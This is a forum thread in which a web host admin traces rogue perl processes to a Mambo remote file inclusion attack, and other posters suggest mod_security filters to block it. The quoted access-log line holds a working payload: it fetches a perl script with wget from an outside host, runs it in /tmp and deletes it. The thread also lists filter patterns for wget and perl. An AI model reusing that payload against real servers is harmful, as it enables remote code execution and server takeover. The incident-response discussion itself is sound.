can not trace process - httpsl

[sint19]

I have a lot of httpsl processes, about 50 at same time
example one of them
[/proc/28899]# ls -al
total 0
dr-xr-xr-x 3 nobody nobody 0 Aug 7 19:04 ./
dr-xr-xr-x 1522 root root 0 Aug 6 00:31 ../
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cmdline
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 cpu
lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 cwd -> //
-r-------- 1 nobody nobody 0 Aug 7 19:05 environ
lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 exe -> /usr/bin/perl*
dr-x------ 2 nobody nobody 0 Aug 7 19:05 fd/
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 maps
-rw------- 1 nobody nobody 0 Aug 7 19:05 mem
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 mounts
lrwxrwxrwx 1 nobody nobody 0 Aug 7 19:05 root -> //
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 stat
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 statm
-r--r--r-- 1 nobody nobody 0 Aug 7 19:05 status



lsof -p 28899
COMMAND PID USER FD TYPE DEVICE SIZE NODE NAME
perl 28899 nobody cwd DIR 130,46 1024 456187906 /
perl 28899 nobody rtd DIR 130,46 1024 456187906 /
perl 28899 nobody txt REG 130,46 942729 509666453 /usr/bin/perl
perl 28899 nobody 0r CHR 1,3 457965571 /dev/null
perl 28899 nobody 1w FIFO 130,5 977102708 pipe
perl 28899 nobody 2w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
perl 28899 nobody 3u IPv4 977413800 TCP my.server.com:34124->rm43.1blu.de:8209 (ESTABLISHED)
perl 28899 nobody 4u unix 0xa22b77e0 977102504 socket
perl 28899 nobody 5u unix 0x248a2760 976881059 socket
perl 28899 nobody 15w REG 130,46 0 689897478 /usr/local/apache/logs/audit_log
perl 28899 nobody 16w REG 130,46 0 689897485 /usr/local/apache/logs/modsec_debug_log
perl 28899 nobody 17w REG 130,46 3331669 689897475 /usr/local/apache/logs/error_log
... a lot of domlogs



for CWD (current working folder) I have only '/'
cat environ - there is nothing
any idea how to stop this (blocking rm43.1blu.de IP will not solve problem)

thanks

 

[chirpy]

Looks like a perl script being run through a compromised PHP script. You're going to have to wade through your domlogs to track it down.

 

[sint19]

Bingo

Thank you, I find it, but still I don't know the best way how to stop this

203.113.132.116 - - [08/Aug/2006:01:56:47 +0200] "GET /index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.mischel.cz/webdesign/images/CISLA/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.mischel.cz/webdesign/images/CISla/mambo.txt;perl%20mambo.txt;rm%20-rf%20mambo.*? HTTP/1.0" 200 24007 "-" "Mozilla/5.0"

exploit use mambo ''mosConfig_absolute_path''
exploit copy mambo.txt perl script to /tmp, execute it, and delete it

 

[HostMerit]

Install mod security through WHM -> Addon Scripts, then add rules to /usr/local/apache/conf/modsec.user.conf and add a rule such as

SecFilter "mosConfig_absolute_path"
SecFilter "wget"
SecFilter "com_content"
SecFilter "perl\x20"

Those will easily block the widely spread exploit / worm.

 

[HostMerit]

Also run killall -9 perl;killall -9 httpd;httpd stop;httpd startssl

That will clear any old processes or running exploits, and restart apache fresh after you've installed mod security and applied the necessary paths.



In the meantime, chmod 700 /usr/bin/wget

ASAP to avoid further exploitation.

 

[sint19]

All done

except
SecFilter "com_content"

it is needed for running mambo, but

SecFilter "mosConfig_absolute_path"
SecFilter "wget"

do great job (HTTP Error 406 - Not acceptable)

Thanks you

 

[HostMerit]

I would also suggest SecFilter "perl\x20"

As that is "perl " and will be used in almost any exploit to run any file. It's better to be safe.

Also you can use my version at http://www.hostmerit.com/modsec.user.conf

It's highly recommended by many users of the Cpanel forums, as I code it myself and update ALOT, also it was recommended directly by Cpanel in a presentation on security at HostingCon.:p :p